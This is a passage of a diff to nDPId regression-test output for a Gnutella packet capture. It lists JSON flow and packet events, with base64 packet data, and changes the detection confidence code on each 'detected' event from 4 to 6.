00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtptYAAIAR2P0KAAIPpIQKGXAJ2AYAWVxSIsUxAlnYy6KYCQUz3Ng+pkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":28681,"dst_port":55302,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtLrQAAIARfUcKAAIPuezIiXAJvA4AWfki1SYxAiU091nTuxkeneMv2EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1255,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.236.200.137","src_port":28681,"dst_port":48142,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":95893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95893,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxQIAAIAR4QoKAAIPvKXLvnAJVesAWQc1IDExAvwLw9eirMeJjOQnPkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1256,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95893,"flow_last_seen":95893,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95893,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":28681,"dst_port":21995,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":95918,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95918,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBEAAEAR33a8pcu+CgACD1XrcAkC37R2IDExAvwLw9eirMeJjOQnPkQAAMACAAAGR1RLRwAA0WC9XX1Cv4OMIP5Uj2dxFVfelx8EvKXLvlXrAQAAAAT+NOnnFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DldTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtLi4AAIARXRAKAAIPLVh123AJGv0AWeqxHFUxAta++c2ylLcKBb\/ez0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1259,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtEcQAAIARHzkKAAIPYPacfnAJ2wYAWfibSFoxAjjwuKgFGYZC9XxYD0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1260,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":95923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95923,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTeMAAIAR4qYKAAIPSfqz7XAJUXAAWYypWMIxAuib5nRI0KcHRTGrFEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95923,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":95941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95941,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBIAAEARuTykhAoZCgACD9gGcAkC39H3IsUxAlnYy6KYCQUz3Ng+pkQAAMACAAAGR1RLRwAAwkI+xsLIWLYQq6EiNHwU7EsyAwwEpIQKGdgGAQAAAAQMPEZKFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 
01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":95956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95956,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBMAAEARArOtt7duCgACD+oQcAkC3zGfh5oxAjZAPvXTOccHXf+KmUQAAMACAAAGR1RLRwAA\/YvF6OaM0g0Esl9zeFHFBmeEb50Erbe3buoQAQAAAASYSwA1FEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo4w=="} 
01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":96048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":96048,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBBQAAEARafBJ+rPtCgACD1FwcAkC30eYWMIxAuib5nRI0KcHRTGrFEQAAMACAAAGR1RLRwAA1jyfIL1wKx4dMkSe+\/yFksXUYD4ESfqz7VFwAQAAAASK6DCmFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":96049,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":96049,"pkt":"UlQAEjUCCAAn5uVZCABFAABtwDYAAIARi2oKAAIPU6CPMHAJkKwAWa9gWsoxAsGbN6aupxEpyf\/jN0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1265,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":96049,"flow_last_seen":96049,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":96049,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"83.160.143.48","src_port":28681,"dst_port":37036,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
